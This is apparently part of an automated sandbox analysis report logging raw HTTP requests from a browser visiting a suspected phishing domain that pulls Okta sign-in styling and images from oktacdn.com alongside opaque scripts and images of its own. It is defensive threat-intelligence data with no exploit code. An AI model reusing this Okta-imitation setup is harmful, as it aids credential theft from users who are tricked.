laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveOrigin: https://zyvk.fgaiuin.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://zyvk.fgaiuin.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://zyvk.fgaiuin.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://zyvk.fgaiuin.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://zyvk.fgaiuin.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveOrigin: https://zyvk.fgaiuin.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveOrigin: https://zyvk.fgaiuin.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /34RyVvuzJYx0eebApfCjIz8yUE5ijn9sGqnQAmC67103 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /wx4JzFCVEPK2a4BmjUySfrZrcstE1RfsssMSRW12127 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrkq6tjIc3r5nBX8S7OdUDvbneJNdxGQmnJ7dx0HaqNlcmCbG67140 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250326%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250326T174256Z&X-Amz-Expires=300&X-Amz-Signature=413aad58fc5a62a1cf0fc9060e10c34dc8b1d81ea0bb99120ce24ddb240ce13c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://zyvk.fgaiuin.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /mnEMzb8jUNnKVyAT3k5kL57E6Hgba7eIuvr3UyuGz2C3Jh6U06zE378147 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klGIQ3dTgD1URPJXa8mcdnV4FEGbv8KXpXQGkBx78170 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /kl8nL56d8pZlDKHXb3O9fQ6A4DEUrS43RyU4x6MwT89WXpqksm7APjTJNpecrdCab230 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klBiF5nBFGI9ZBA6VNTLBYDtbLEUH4xH2WD565XSQVInIrw2Ga7S5GyD4TQujTVYuv213 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /wx4JzFCVEPK2a4BmjUySfrZrcstE1RfsssMSRW12127 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; 